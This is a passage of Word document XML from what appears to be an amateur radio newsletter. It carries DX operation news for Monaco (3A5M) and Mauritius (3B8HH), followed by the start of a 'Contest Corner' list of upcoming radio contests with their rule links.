        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>st</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>of Monaco (1848-1922) with special call 3A5M. Activity will be on SSB,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Digital and CW from April 1 to May 31, 2022. QSL via the bureau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFBA574" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A0719F3" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">3B8 – Mauritius - </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>3B8HH is the call HB9DNG/F5UKV (ex-9Q5RP), Ray, has for Mauritius,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>where he expects to be starting around January 20th.  The QTH is a</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">small village, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Pereyberein</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">, close to Cap </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Malheureux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the north part</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">of the island.  I believe "Cap </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Malheureux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>," French, means "Cape of</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Unhappiness!"  He will have 100 watts to wires, 80-2M, possibly 160,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>mostly CW and "some SSB."  On digital, he will start with PSK, then</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RTTY, and might try 10M FM.  He hopes to be on the air daily from</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1800Z.  Ray says he's old school and prefers paper QSLs.  He will use</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>the Mauritius QSL bureau and will also upload the log to Club Log.  No</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>eQSL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="222222"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7B4BB4" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E141CB9" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="240" w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:jc w:val="center"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">DAH DIT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> DAH   </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DAH</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> DIT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>DIT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> DAH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="549EA113" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="649634C2" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7172F507" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="contest"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253004800" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3D415C47" wp14:editId="0F7DF639">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-3175</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1648055" cy="1695687"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="9" name="Picture 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ext&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId160">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1648055" cy="1695687"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Below is a list of upcoming contests in the “Contest Corner”. I think this is important for someone who is trying to move up the DXCC ladder since entities that are on the rarer side and easiest to work in contests. Some of my best “catches” have been on the Sunday afternoon of a contest when the rarer entities are begging for QSOs. Of course, the gamble is that if you wait until Sunday, conditions may change, or they simply won’t be workable. However, it is not a bad gamble. Of course, why not work the contest and have some fun!</w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
        <w:t>Check out the WA7BNM Contest Calendar page (</w:t>
      </w:r>
      <w:hyperlink r:id="rId161" w:history="1">
        <w:r w:rsidRPr="00FC1FAE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.contestcalendar.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>) and CQ Magazine for more contests or more details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622F05BA" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">The contests in </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve">red </w:t>
      </w:r>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>are those that I plan to spend some significant participation time on. PLEASE let me know if you are working contests and how you fared.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FB97E6" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FC1FAE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:tab/>
        <w:t>Thanks!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFF188B" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid9"/>
        <w:tblW w:w="9355" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1511"/>
        <w:gridCol w:w="2983"/>
        <w:gridCol w:w="4861"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="64253F72" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B5D32A2" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Jan. 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="716C5C25" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>UKEICC 80 M Contest SSB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6517FBD6" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId162" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>https://ukeicc.com/80m-rules.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w14:paraId="228EDEE4" w14:textId="77777777" w:rsidTr="008D7040">
        <w:trPr>
          <w:trHeight w:val="263"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1511" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03FFD82D" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>Jan. 5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2983" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0914EF12" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="00FC1FAE" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t>VHF-UHF FT8 Activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4861" w:type="dxa"/>
            <w:noWrap/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03244C47" w14:textId="77777777" w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE" w:rsidRDefault="0084211F" w:rsidP="00FC1FAE">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId163" w:history="1">
              <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:color w:val="0000FF"/>
                  <w:u w:val="single"/>
                </w:rPr>
                <w:t>www.ft8activity.eu/index.php/en</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00FC1FAE" w:rsidRPr="00FC1FAE">
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:color w:val="363435"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
